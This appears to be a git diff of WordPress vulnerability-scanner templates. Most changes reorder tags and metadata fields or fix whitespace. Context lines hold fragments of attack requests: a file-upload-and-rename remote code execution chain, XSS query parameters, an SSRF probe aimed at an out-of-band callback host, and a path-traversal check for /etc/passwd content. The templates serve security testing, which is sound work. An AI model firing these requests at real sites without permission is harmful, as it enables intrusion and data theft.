CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cwe-id: CWE-601 - tags: wordpress,wp-plugin,redirect metadata: max-request: 1 + tags: wordpress,wp-plugin,redirect http: - method: GET diff --git a/http/vulnerabilities/wordpress/woocommerce-pdf-invoices-xss.yaml b/http/vulnerabilities/wordpress/woocommerce-pdf-invoices-xss.yaml index 8d632e03f7..857fd8fe38 100644 --- a/http/vulnerabilities/wordpress/woocommerce-pdf-invoices-xss.yaml +++ b/http/vulnerabilities/wordpress/woocommerce-pdf-invoices-xss.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-80 - tags: xss,wp,wordpress,woocommerce,authenticated,wpscan,wp-plugin metadata: max-request: 2 + tags: xss,wp,wordpress,woocommerce,authenticated,wpscan,wp-plugin http: - raw: @@ -26,12 +26,12 @@ http: Cookie: wordpress_test_cookie=WP%20Cookie%20check log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | GET /wp-admin/admin.php?page=wpo_wcpdf_options_page&tab=documents§ion=invoice&"> HTTP/1.1 Host: {{Hostname}} cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml b/http/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml index e24588ca40..11a729e5d6 100644 --- a/http/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml +++ b/http/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml @@ -40,6 +40,7 @@ http: - '{{BaseURL}}/_wpeprivate/config.json' stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml b/http/vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml index d67de42f7b..72a3e76429 100644 --- a/http/vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml +++ b/http/vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml @@ -4,9 +4,9 @@ info: name: WordPress Plugin "AffiliateWP -- Allowed Products" Log Disclosure author: dhiyaneshDK severity: low - tags: wordpress,log,plugin metadata: max-request: 1 + tags: wordpress,log,plugin http: - method: GET diff --git a/http/vulnerabilities/wordpress/wordpress-bbpress-plugin-listing.yaml b/http/vulnerabilities/wordpress/wordpress-bbpress-plugin-listing.yaml index fadf83cc41..78426a7dba 100644 --- a/http/vulnerabilities/wordpress/wordpress-bbpress-plugin-listing.yaml +++ b/http/vulnerabilities/wordpress/wordpress-bbpress-plugin-listing.yaml @@ -7,9 +7,9 @@ info: description: Searches for sensitive directories present in the bbpress wordpress plugin. reference: - https://www.exploit-db.com/ghdb/6158 - tags: wordpress,listing,plugin,edb metadata: max-request: 1 + tags: wordpress,listing,plugin,edb http: - method: GET diff --git a/http/vulnerabilities/wordpress/wordpress-db-backup-listing.yaml b/http/vulnerabilities/wordpress/wordpress-db-backup-listing.yaml index 600f3cbf7d..4f1de1703e 100644 --- a/http/vulnerabilities/wordpress/wordpress-db-backup-listing.yaml +++ b/http/vulnerabilities/wordpress/wordpress-db-backup-listing.yaml @@ -4,9 +4,9 @@ info: name: WordPress DB Backup author: Suman_Kar severity: medium - tags: wordpress,backup metadata: max-request: 1 + tags: wordpress,backup http: - method: GET @@ -25,4 +25,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/vulnerabilities/wordpress/wordpress-db-backup.yaml b/http/vulnerabilities/wordpress/wordpress-db-backup.yaml index a33e59fd82..4cc6c3c4a3 100644 --- a/http/vulnerabilities/wordpress/wordpress-db-backup.yaml +++ b/http/vulnerabilities/wordpress/wordpress-db-backup.yaml @@ -4,14 +4,15 @@ info: name: WordPress DB Backup author: dwisiswant0 severity: medium - tags: wordpress,backups metadata: max-request: 1 + tags: wordpress,backups http: - method: GET path: - "{{BaseURL}}/wp-content/backup-db/" + matchers-condition: and matchers: - type: word @@ -20,6 +21,7 @@ http: - ".sql\">" condition: and part: body + - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/vulnerabilities/wordpress/wordpress-db-repair.yaml b/http/vulnerabilities/wordpress/wordpress-db-repair.yaml index ed7cc71378..2283e0a8f5 100644 --- a/http/vulnerabilities/wordpress/wordpress-db-repair.yaml +++ b/http/vulnerabilities/wordpress/wordpress-db-repair.yaml @@ -5,9 +5,9 @@ info: author: _C0wb0y_ severity: low description: Discover enabled Wordpress repair page. - tags: wordpress,config,fpd metadata: max-request: 1 + tags: wordpress,config,fpd http: - method: GET diff --git a/http/vulnerabilities/wordpress/wordpress-debug-log.yaml b/http/vulnerabilities/wordpress/wordpress-debug-log.yaml index d299d43945..8be6bb88ce 100644 --- a/http/vulnerabilities/wordpress/wordpress-debug-log.yaml +++ b/http/vulnerabilities/wordpress/wordpress-debug-log.yaml @@ -4,9 +4,9 @@ info: name: WordPress debug log author: geraldino2,dwisiswant0 severity: low - tags: wordpress,log metadata: max-request: 1 + tags: wordpress,log http: - method: GET @@ -29,4 +29,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/vulnerabilities/wordpress/wordpress-directory-listing.yaml b/http/vulnerabilities/wordpress/wordpress-directory-listing.yaml index c541a2f8f9..c656fff7a6 100644 --- a/http/vulnerabilities/wordpress/wordpress-directory-listing.yaml +++ b/http/vulnerabilities/wordpress/wordpress-directory-listing.yaml @@ -4,9 +4,9 @@ info: name: Wordpress directory listing author: Manas_Harsh severity: info - tags: wordpress metadata: max-request: 4 + tags: wordpress http: - method: GET diff --git a/http/vulnerabilities/wordpress/wordpress-elementor-plugin-listing.yaml b/http/vulnerabilities/wordpress/wordpress-elementor-plugin-listing.yaml index d65123b65d..7ba0c6f44f 100644 --- a/http/vulnerabilities/wordpress/wordpress-elementor-plugin-listing.yaml +++ b/http/vulnerabilities/wordpress/wordpress-elementor-plugin-listing.yaml @@ -7,9 +7,9 @@ info: description: Searches for sensitive directories present in the elementor wordpress plugin. reference: - https://www.exploit-db.com/ghdb/6297 - tags: listing,plugin,edb,wordpress metadata: max-request: 1 + tags: listing,plugin,edb,wordpress http: - method: GET diff --git a/http/vulnerabilities/wordpress/wordpress-emergency-script.yaml b/http/vulnerabilities/wordpress/wordpress-emergency-script.yaml index 42323138d3..63d26ab80f 100644 --- a/http/vulnerabilities/wordpress/wordpress-emergency-script.yaml +++ b/http/vulnerabilities/wordpress/wordpress-emergency-script.yaml @@ -6,9 +6,9 @@ info: severity: info reference: - https://wordpress.org/support/article/resetting-your-password/#using-the-emergency-password-reset-script - tags: wordpress metadata: max-request: 1 + tags: wordpress http: - method: GET @@ -24,6 +24,7 @@ http: - "Update Options" condition: and part: body + - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/vulnerabilities/wordpress/wordpress-git-config.yaml b/http/vulnerabilities/wordpress/wordpress-git-config.yaml index 7af7ab5288..5b7329f574 100644 --- a/http/vulnerabilities/wordpress/wordpress-git-config.yaml +++ b/http/vulnerabilities/wordpress/wordpress-git-config.yaml @@ -7,9 +7,9 @@ info: description: Searches for the pattern /.git/config inside themes and plugins folder. reference: - https://hackerone.com/reports/248693 - tags: hackerone,config,git,exposure,wordpress,wp-plugin,wp-theme metadata: max-request: 2 + tags: hackerone,config,git,exposure,wordpress,wp-plugin,wp-theme http: - method: GET diff --git a/http/vulnerabilities/wordpress/wordpress-gtranslate-plugin-listing.yaml b/http/vulnerabilities/wordpress/wordpress-gtranslate-plugin-listing.yaml index 67b6829344..18a14f458b 100644 --- a/http/vulnerabilities/wordpress/wordpress-gtranslate-plugin-listing.yaml +++ b/http/vulnerabilities/wordpress/wordpress-gtranslate-plugin-listing.yaml @@ -7,9 +7,9 @@ info: description: Searches for sensitive directories present in the gtranslate wordpress plugin. reference: - https://www.exploit-db.com/ghdb/6160 - tags: wordpress,listing,plugin,edb metadata: max-request: 1 + tags: wordpress,listing,plugin,edb http: - method: GET diff --git a/http/vulnerabilities/wordpress/wordpress-installer-log.yaml b/http/vulnerabilities/wordpress/wordpress-installer-log.yaml index 956f632108..50e33abe8a 100644 --- a/http/vulnerabilities/wordpress/wordpress-installer-log.yaml +++ b/http/vulnerabilities/wordpress/wordpress-installer-log.yaml @@ -4,20 +4,22 @@ info: name: WordPress Installer Log author: dwisiswant0 severity: info - tags: wordpress,log metadata: max-request: 1 + tags: wordpress,log http: - method: GET path: - "{{BaseURL}}/installer-log.txt" + matchers-condition: and matchers: - type: regex regex: - "(?mi)DUPLICATOR(-|\\s)?(PRO|LITE)?:? INSTALL-LOG" part: body + - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml b/http/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml index f7f8c4b350..daead774cb 100644 --- a/http/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml +++ b/http/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml @@ -10,12 +10,11 @@ info: - https://wpscan.com/vulnerability/10192 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 metadata: max-request: 3 tags: wp,wpscan,wordpress,wp-plugin,rce,intrusive,fileupload - variables: filepath: '{{rand_base(7, "abcdefghi")}}' @@ -49,7 +48,6 @@ http: --6985fa39c0698d07f6d418b37388e1b2-- - - | POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1 Host: {{Hostname}} @@ -58,7 +56,6 @@ http: Content-Type: application/x-www-form-urlencoded eeSFL_ID=1&eeFileOld={{filepath}}.png&eeListFolder=%2F&eeFileAction=Rename%7C{{filepath}}.php - - | GET /wp-content/uploads/simple-file-list/{{filepath}}.php HTTP/1.1 Host: {{Hostname}} diff --git a/http/vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml b/http/vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml index 98eda25c07..5cc111b392 100644 --- a/http/vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml +++ b/http/vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml @@ -4,19 +4,19 @@ info: name: Wordpress RDF User Enumeration author: r3dg33k severity: info - tags: wordpress,enum metadata: max-request: 1 + tags: wordpress,enum http: - method: GET path: - '{{BaseURL}}/feed/rdf' + host-redirects: true matchers-condition: and matchers: - - type: word part: header words: diff --git a/http/vulnerabilities/wordpress/wordpress-redirection-plugin-listing.yaml b/http/vulnerabilities/wordpress/wordpress-redirection-plugin-listing.yaml index 7cf7db227d..26e8797ac1 100644 --- a/http/vulnerabilities/wordpress/wordpress-redirection-plugin-listing.yaml +++ b/http/vulnerabilities/wordpress/wordpress-redirection-plugin-listing.yaml @@ -7,9 +7,9 @@ info: description: Searches for sensitive directories present in the redirection plugin. reference: - https://www.exploit-db.com/ghdb/6436 - tags: wordpress,listing,plugin,edb metadata: max-request: 1 + tags: wordpress,listing,plugin,edb http: - method: GET diff --git a/http/vulnerabilities/wordpress/wordpress-social-metrics-tracker.yaml b/http/vulnerabilities/wordpress/wordpress-social-metrics-tracker.yaml index d17720a497..3c498c1cf9 100644 --- a/http/vulnerabilities/wordpress/wordpress-social-metrics-tracker.yaml +++ b/http/vulnerabilities/wordpress/wordpress-social-metrics-tracker.yaml @@ -8,9 +8,9 @@ info: The lack of proper authorisation when exporting data from the plugin could allow unauthenticated users to get information about the posts and page of the blog, including their author's username and email. reference: - https://wpscan.com/vulnerability/f4eed3ba-2746-426f-b030-a8c432defeb2 - tags: wordpress,wp-plugin,wp,unauth,wpscan metadata: max-request: 1 + tags: wordpress,wp-plugin,wp,unauth,wpscan http: - method: GET diff --git a/http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml b/http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml index 60e601b914..0d275b60f6 100644 --- a/http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml +++ b/http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml @@ -8,8 +8,8 @@ info: - https://book.hacktricks.xyz/pentesting/pentesting-web/wordpress - https://github.com/incogbyte/quickpress/blob/master/core/req.go metadata: - fofa-query: body="oembed" && body="wp-" max-request: 2 + fofa-query: body="oembed" && body="wp-" tags: wordpress,ssrf,oast,oembed http: @@ -17,7 +17,6 @@ http: - | GET /wp-json/oembed/1.0/proxy HTTP/1.1 Host: {{Hostname}} - - | GET /wp-json/oembed/1.0/proxy?url=http://{{interactsh-url}} HTTP/1.1 Host: {{Hostname}} diff --git a/http/vulnerabilities/wordpress/wordpress-tmm-db-migrate.yaml b/http/vulnerabilities/wordpress/wordpress-tmm-db-migrate.yaml index 136e788ec7..7e47213346 100644 --- a/http/vulnerabilities/wordpress/wordpress-tmm-db-migrate.yaml +++ b/http/vulnerabilities/wordpress/wordpress-tmm-db-migrate.yaml @@ -4,9 +4,9 @@ info: name: WordPress ThemeMarkers DB Migration File author: dwisiswant0 severity: info - tags: wordpress,wp-plugin,backup metadata: max-request: 1 + tags: wordpress,wp-plugin,backup http: - method: GET @@ -14,6 +14,7 @@ http: - "{{BaseURL}}/wp-content/uploads/tmm_db_migrate/tmm_db_migrate.zip" max-size: 1000 + matchers-condition: and matchers: - type: word @@ -32,4 +33,4 @@ http: - type: binary binary: - - "504B0304" # zip \ No newline at end of file + - "504B0304" # zip diff --git a/http/vulnerabilities/wordpress/wordpress-total-upkeep-backup-download.yaml b/http/vulnerabilities/wordpress/wordpress-total-upkeep-backup-download.yaml index ace7c06f3d..daad4c9bcb 100644 --- a/http/vulnerabilities/wordpress/wordpress-total-upkeep-backup-download.yaml +++ b/http/vulnerabilities/wordpress/wordpress-total-upkeep-backup-download.yaml @@ -6,9 +6,9 @@ info: severity: high reference: - https://www.exploit-db.com/exploits/49252 - tags: wordpress,wp-plugin,edb metadata: max-request: 1 + tags: wordpress,wp-plugin,edb http: - method: GET @@ -17,7 +17,6 @@ http: matchers-condition: and matchers: - - type: word words: - "application/json" @@ -32,4 +31,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/vulnerabilities/wordpress/wordpress-updraftplus-pem-key.yaml b/http/vulnerabilities/wordpress/wordpress-updraftplus-pem-key.yaml index 4eb4bfe2ac..d04a1584f2 100644 --- a/http/vulnerabilities/wordpress/wordpress-updraftplus-pem-key.yaml +++ b/http/vulnerabilities/wordpress/wordpress-updraftplus-pem-key.yaml @@ -6,9 +6,9 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/6437 - tags: wp-plugin,edb,wordpress metadata: max-request: 1 + tags: wp-plugin,edb,wordpress http: - method: GET diff --git a/http/vulnerabilities/wordpress/wordpress-user-enum.yaml b/http/vulnerabilities/wordpress/wordpress-user-enum.yaml index 9fa745557f..a479b62994 100644 --- a/http/vulnerabilities/wordpress/wordpress-user-enum.yaml +++ b/http/vulnerabilities/wordpress/wordpress-user-enum.yaml @@ -4,9 +4,9 @@ info: name: Wordpress User Enumeration author: r3dg33k severity: info - tags: wordpress metadata: max-request: 1 + tags: wordpress http: - method: GET @@ -19,6 +19,7 @@ http: regex: - '(?i)Location: http(s|):\/\/[\w\.\-]+\/author\/\w+' part: header + - type: status status: - 301 diff --git a/http/vulnerabilities/wordpress/wordpress-woocommerce-listing.yaml b/http/vulnerabilities/wordpress/wordpress-woocommerce-listing.yaml index e80166e4d8..cca8f99773 100644 --- a/http/vulnerabilities/wordpress/wordpress-woocommerce-listing.yaml +++ b/http/vulnerabilities/wordpress/wordpress-woocommerce-listing.yaml @@ -7,14 +7,15 @@ info: description: WordPress WooCommerce plugin sensitive directory searches were conducted. reference: - https://www.exploit-db.com/ghdb/6192 - tags: edb,wordpress,listing,plugin,woocommerce metadata: max-request: 1 + tags: edb,wordpress,listing,plugin,woocommerce http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/woocommerce/" + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml b/http/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml index e37f13595c..9fc55116c0 100644 --- a/http/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml +++ b/http/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: wordpress,wp-plugin,lfi,wordfence,edb metadata: max-request: 1 + tags: wordpress,wp-plugin,lfi,wordfence,edb http: - method: GET @@ -23,7 +23,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/vulnerabilities/wordpress/wordpress-wordfence-waf-bypass-xss.yaml b/http/vulnerabilities/wordpress/wordpress-wordfence-waf-bypass-xss.yaml index 2069c06e63..76dad76154 100644 --- a/http/vulnerabilities/wordpress/wordpress-wordfence-waf-bypass-xss.yaml +++ b/http/vulnerabilities/wordpress/wordpress-wordfence-waf-bypass-xss.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-80 - tags: wordpress,wordfence,xss,bypass metadata: max-request: 1 + tags: wordpress,wordfence,xss,bypass http: - method: GET diff --git a/http/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml b/http/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml index 494820c591..35a158ece3 100644 --- a/http/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml +++ b/http/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-80 - tags: wordpress,wp-plugin,xss,wordfence metadata: max-request: 1 + tags: wordpress,wp-plugin,xss,wordfence http: - method: GET diff --git a/http/vulnerabilities/wordpress/wordpress-wp-cron.yaml b/http/vulnerabilities/wordpress/wordpress-wp-cron.yaml index 665d13919a..3d7ddcc291 100644 --- a/http/vulnerabilities/wordpress/wordpress-wp-cron.yaml +++ b/http/vulnerabilities/wordpress/wordpress-wp-cron.yaml @@ -8,9 +8,9 @@ info: reference: - https://book.hacktricks.xyz/pentesting/pentesting-web/wordpress - https://medium.com/@thecpanelguy/the-nightmare-that-is-wpcron-php-ae31c1d3ae30 - tags: wordpress,cron,wp,dos metadata: max-request: 2 + tags: wordpress,cron,wp,dos http: - method: GET @@ -19,6 +19,7 @@ http: - "{{BaseURL}}/wp-cron.php" req-condition: true + matchers-condition: and matchers: - type: dsl diff --git a/http/vulnerabilities/wordpress/wordpress-xmlrpc-listmethods.yaml b/http/vulnerabilities/wordpress/wordpress-xmlrpc-listmethods.yaml index 3f5eff128c..175fa504ca 100644 --- a/http/vulnerabilities/wordpress/wordpress-xmlrpc-listmethods.yaml +++ b/http/vulnerabilities/wordpress/wordpress-xmlrpc-listmethods.yaml @@ -4,9 +4,9 @@ info: name: Wordpress XML-RPC List System Methods author: 0ut0fb4nd severity: info - tags: wordpress metadata: max-request: 1 + tags: wordpress http: - method: POST @@ -20,10 +20,11 @@ http: - type: status status: - 200 + - type: word words: - "system.multicall" - "system.listMethods" - "demo.sayHello" condition: and - part: body \ No newline at end of file + part: body diff --git a/http/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml b/http/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml index 489a8638ad..04604de000 100644 --- a/http/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml +++ b/http/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml @@ -13,9 +13,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-80 - tags: wordpress,xss,wp,wpscan metadata: max-request: 1 + tags: wordpress,xss,wp,wpscan,intrusive http: - raw: diff --git a/http/vulnerabilities/wordpress/wp-123contactform-plugin-listing.yaml b/http/vulnerabilities/wordpress/wp-123contactform-plugin-listing.yaml index 12269073c3..993a18ab3a 100644 --- a/http/vulnerabilities/wordpress/wp-123contactform-plugin-listing.yaml +++ b/http/vulnerabilities/wordpress/wp-123contactform-plugin-listing.yaml @@ -8,9 +8,9 @@ info: reference: - https://blog.sucuri.net/2021/01/critical-vulnerabilities-in-123contactform-for-wordpress-wordpress-plugin.html - https://www.exploit-db.com/ghdb/6979 - tags: wordpress,listing,plugin,edb metadata: max-request: 1 + tags: wordpress,listing,plugin,edb http: - method: GET diff --git a/http/vulnerabilities/wordpress/wp-adaptive-xss.yaml b/http/vulnerabilities/wordpress/wp-adaptive-xss.yaml index 871a276ca1..41670b8c04 100644 --- a/http/vulnerabilities/wordpress/wp-adaptive-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-adaptive-xss.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: wpscan,wordpress,xss,wp-plugin,wp metadata: max-request: 1 + tags: wpscan,wordpress,xss,wp-plugin,wp http: - method: GET diff --git a/http/vulnerabilities/wordpress/wp-all-export-xss.yaml b/http/vulnerabilities/wordpress/wp-all-export-xss.yaml index be9023c90b..b5efb6efcb 100644 --- a/http/vulnerabilities/wordpress/wp-all-export-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-all-export-xss.yaml @@ -5,15 +5,15 @@ info: author: Akincibor severity: medium description: WordPress All Export plugin before version 1.3.6 does not escape some URLs before outputting them back in attributes, leading to reflected cross-site scripting. - metadata: - max-request: 2 - verified: true reference: - https://wpscan.com/vulnerability/de330a59-d64d-40be-86df-98997949e5e4 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-80 + metadata: + verified: true + max-request: 2 tags: wp-plugin,xss,wp,wordpress,authenticated,wpscan http: @@ -26,12 +26,12 @@ http: Cookie: wordpress_test_cookie=WP%20Cookie%20check log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | GET /wp-admin/admin.php?page=pmxe-admin-manage&a"> HTTP/1.1 Host: {{Hostname}} cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/wordpress/wp-altair-listing.yaml b/http/vulnerabilities/wordpress/wp-altair-listing.yaml index abb1bc43e4..26bfe7aa75 100644 --- a/http/vulnerabilities/wordpress/wp-altair-listing.yaml +++ b/http/vulnerabilities/wordpress/wp-altair-listing.yaml @@ -5,9 +5,9 @@ info: author: pussycat0x severity: info description: Searches for directories listing in the altair theme. - tags: wordpress,listing,wp-theme metadata: max-request: 4 + tags: wordpress,listing,wp-theme http: - method: GET diff --git a/http/vulnerabilities/wordpress/wp-ambience-xss.yaml b/http/vulnerabilities/wordpress/wp-ambience-xss.yaml index 296d7c6a35..4da2dcd63e 100644 --- a/http/vulnerabilities/wordpress/wp-ambience-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-ambience-xss.yaml @@ -13,9 +13,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-80 - tags: wp-plugin,wp,edb,wpscan,wordpress,xss metadata: max-request: 1 + tags: wp-plugin,wp,edb,wpscan,wordpress,xss http: - method: GET diff --git a/http/vulnerabilities/wordpress/wp-arforms-listing.yaml b/http/vulnerabilities/wordpress/wp-arforms-listing.yaml index d608ac0578..52c4604159 100644 --- a/http/vulnerabilities/wordpress/wp-arforms-listing.yaml +++ b/http/vulnerabilities/wordpress/wp-arforms-listing.yaml @@ -7,18 +7,16 @@ info: description: Searches for sensitive directories present in the arforms plugin. reference: - https://www.exploit-db.com/ghdb/6424 - tags: listing,plugin,edb,wordpress metadata: max-request: 1 + tags: listing,plugin,edb,wordpress http: - - method: GET path: - "{{BaseURL}}/wp-content/plugins/arforms/" matchers-condition: and - matchers: - type: word words: @@ -27,6 +25,5 @@ http: condition: and - type: status - status: - 200 diff --git a/http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml b/http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml index 1e82a7f971..e632b67e77 100644 --- a/http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml +++ b/http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml @@ -10,8 +10,8 @@ info: - https://wpscan.com/vulnerability/9188 - https://wordpress.org/plugins/wp-autosuggest/ metadata: - max-request: 1 verified: true + max-request: 1 tags: wp-plugin,wp,wp-autosuggest,wpscan,sqli,wordpress http: diff --git a/http/vulnerabilities/wordpress/wp-blogroll-fun-xss.yaml b/http/vulnerabilities/wordpress/wp-blogroll-fun-xss.yaml index 688ad66964..ca357fff69 100644 --- a/http/vulnerabilities/wordpress/wp-blogroll-fun-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-blogroll-fun-xss.yaml @@ -10,13 +10,13 @@ info: reference: - https://codevigilant.com/disclosure/wp-plugin-blogroll-fun-a3-cross-site-scripting-xss/ - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-blogroll-fun-show-last-post-and-last-update-time-cross-site-scripting-0-8-4/ - metadata: - max-request: 1 - verified: true classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 + metadata: + verified: true + max-request: 1 tags: wordpress,wp-plugin,xss,unauth,wp http: diff --git a/http/vulnerabilities/wordpress/wp-code-snippets-xss.yaml b/http/vulnerabilities/wordpress/wp-code-snippets-xss.yaml index ec954913e6..ac8d3e22bf 100644 --- a/http/vulnerabilities/wordpress/wp-code-snippets-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-code-snippets-xss.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-80 - tags: wordpress,xss,wp-plugin,authenticated metadata: max-request: 2 + tags: wordpress,xss,wp-plugin,authenticated http: - raw: @@ -25,12 +25,12 @@ http: Cookie: wordpress_test_cookie=WP%20Cookie%20check log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | GET /wp-admin/admin.php?page=snippets&tag= HTTP/1.1 Host: {{Hostname}} cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/wordpress/wp-config-setup.yaml b/http/vulnerabilities/wordpress/wp-config-setup.yaml index fc2e188bba..401ba980fb 100644 --- a/http/vulnerabilities/wordpress/wp-config-setup.yaml +++ b/http/vulnerabilities/wordpress/wp-config-setup.yaml @@ -6,9 +6,9 @@ info: severity: high reference: - https://smaranchand.com.np/2020/04/misconfigured-wordpress-takeover-to-remote-code-execution/ - tags: wordpress,setup metadata: max-request: 1 + tags: wordpress,setup http: - method: GET diff --git a/http/vulnerabilities/wordpress/wp-custom-tables-xss.yaml b/http/vulnerabilities/wordpress/wp-custom-tables-xss.yaml index 53d74d09f3..09dd9551ec 100644 --- a/http/vulnerabilities/wordpress/wp-custom-tables-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-custom-tables-xss.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: wpscan,wordpress,xss,wp-plugin metadata: max-request: 1 + tags: wpscan,wordpress,xss,wp-plugin http: - method: GET diff --git a/http/vulnerabilities/wordpress/wp-email-subscribers-listing.yaml b/http/vulnerabilities/wordpress/wp-email-subscribers-listing.yaml index 02579bd874..698f8333e9 100644 --- a/http/vulnerabilities/wordpress/wp-email-subscribers-listing.yaml +++ b/http/vulnerabilities/wordpress/wp-email-subscribers-listing.yaml @@ -7,15 +7,15 @@ info: description: Searches for sensitive directories present in the email-subscribers plugin. reference: - https://www.exploit-db.com/ghdb/6428 - tags: wordpress,listing,plugin,edb metadata: max-request: 1 + tags: wordpress,listing,plugin,edb http: - - method: GET path: - "{{BaseURL}}/wp-content/plugins/email-subscribers" + matchers-condition: and matchers: - type: word @@ -25,6 +25,5 @@ http: condition: and - type: status - status: - 200 diff --git a/http/vulnerabilities/wordpress/wp-enabled-registration.yaml b/http/vulnerabilities/wordpress/wp-enabled-registration.yaml index a1822e22a6..6bd3ca2642 100644 --- a/http/vulnerabilities/wordpress/wp-enabled-registration.yaml +++ b/http/vulnerabilities/wordpress/wp-enabled-registration.yaml @@ -4,9 +4,9 @@ info: name: WordPress user registration enabled author: Ratnadip Gajbhiye severity: info - tags: wordpress metadata: max-request: 1 + tags: wordpress http: - method: GET diff --git a/http/vulnerabilities/wordpress/wp-finder-xss.yaml b/http/vulnerabilities/wordpress/wp-finder-xss.yaml index e8d703608e..34427fb1bb 100644 --- a/http/vulnerabilities/wordpress/wp-finder-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-finder-xss.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: xss,wp-plugin,packetstorm,wordpress metadata: max-request: 1 + tags: xss,wp-plugin,packetstorm,wordpress http: - method: GET diff --git a/http/vulnerabilities/wordpress/wp-flagem-xss.yaml b/http/vulnerabilities/wordpress/wp-flagem-xss.yaml index 